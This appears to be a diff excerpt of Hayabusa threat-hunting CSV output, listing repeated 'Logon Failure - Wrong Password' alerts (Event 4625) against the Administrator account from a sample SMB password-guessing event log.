+2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ex5Awm2zaVhvAMTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I72BOMPQHyyP374g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4al5pUa4mKfbL734 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UNHH8ESWZ4Rx6K93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ay3XdxRFXXaD4Ib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PgyG7spUL5glkVh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6D6PVnrIODwtcIXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cRZgqmQbL3l7KTke | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
